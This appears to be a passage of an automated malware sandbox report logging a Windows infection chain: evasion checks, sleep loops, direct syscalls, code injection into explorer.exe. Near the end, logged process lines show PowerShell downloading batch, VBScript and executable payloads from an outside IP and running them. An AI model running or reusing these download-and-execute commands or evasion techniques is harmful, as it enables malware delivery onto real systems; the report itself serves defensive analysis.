                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\DZIPR.exeAPI/Special instruction interceptor: Address: 6C5B7C44
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI/Special instruction interceptor: Address: 6C5B7C44
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI/Special instruction interceptor: Address: 6C5B7945
                      Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6C5B3B54
                      Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 8FA317
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3631Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4211Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3046Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2607Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4872Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2554Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7635Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2050Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qapuwvrJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\demhwkJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gpsJump to dropped file
                      Source: C:\Users\user\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_17-18806
                      Source: C:\Users\user\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_17-18904
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_18-15698
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_18-16967
                      Source: C:\Users\user\DZIPR.exeAPI coverage: 4.4 %
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI coverage: 4.6 %
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI coverage: 3.9 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516Thread sleep count: 3631 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4188Thread sleep count: 4211 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3000Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3220Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312Thread sleep count: 3046 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312Thread sleep count: 2607 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3004Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5896Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6124Thread sleep count: 4872 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2064Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016Thread sleep count: 2554 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5616Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044Thread sleep count: 7635 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4864Thread sleep count: 2050 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5692Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 4392Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,16_2_0040301A
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,16_2_00402B79
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA4748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,17_2_6FA4748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C51748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,18_2_6C51748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAC748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,23_2_6FAC748E
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                      Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                      Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                      Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                      Source: DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6vmware
                      Source: AUGUST.exe, 00000010.00000002.2347238226.000000000051F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                      Source: svchost.exe, 00000015.00000002.3402164901.0000020619C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.3403620854.000002061F257000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                      Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                      Source: C:\Users\user\DZIPR.exeAPI call chain: ExitProcess graph end nodegraph_17-18905
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI call chain: ExitProcess graph end nodegraph_18-15700
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI call chain: ExitProcess graph end nodegraph_18-15730
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA53F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_6FA53F34
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,16_2_00406D5D
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA45D78 mov eax, dword ptr fs:[00000030h]17_2_6FA45D78
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA45CA0 mov eax, dword ptr fs:[00000030h]17_2_6FA45CA0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C515CA0 mov eax, dword ptr fs:[00000030h]18_2_6C515CA0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAC5CA0 mov eax, dword ptr fs:[00000030h]23_2_6FAC5CA0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA53F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_6FA53F34
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA5CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_6FA5CE5C
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA58034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_6FA58034
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C52CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_6C52CE5C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C523F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_6C523F34
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C528034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_6C528034
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAD3F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_6FAD3F34
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FADCE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_6FADCE5C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAD8034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_6FAD8034

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Users\user\DZIPR.exeNtQuerySystemInformation: Direct from: 0x6FA466A2Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x6FB2E812Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x6FB32B7A
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x6C582A72Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtQuerySystemInformation: Direct from: 0x6C5166A2Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtQuerySystemInformation: Direct from: 0x6FAC66A2
                      Source: C:\Users\user\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 1460 base: 8F79C0 value: 55Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 1460 base: 400000 value: 00Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 5388 base: 8F79C0 value: 55Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 5388 base: 400000 value: 00Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 4924 base: 8F79C0 value: 55
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 4924 base: 400000 value: 00
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 8F79C0Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 400000Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 8F79C0Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 400000Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 8F79C0
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 400000
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.batJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.batJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeProcess created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_0040D72E cpuid 16_2_0040D72E
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,16_2_00401F9D
                      Source: C:\Users\user\DZIPR.exeCode function: GetLocaleInfoA,17_2_6FA64DBC
                      Source: C:\Users\user\DZIPR.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,17_2_6FA489B5
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoA,18_2_6C534DBC
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,18_2_6C5189B5
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoA,23_2_6FAE4DBC
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,23_2_6FAC89B5
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
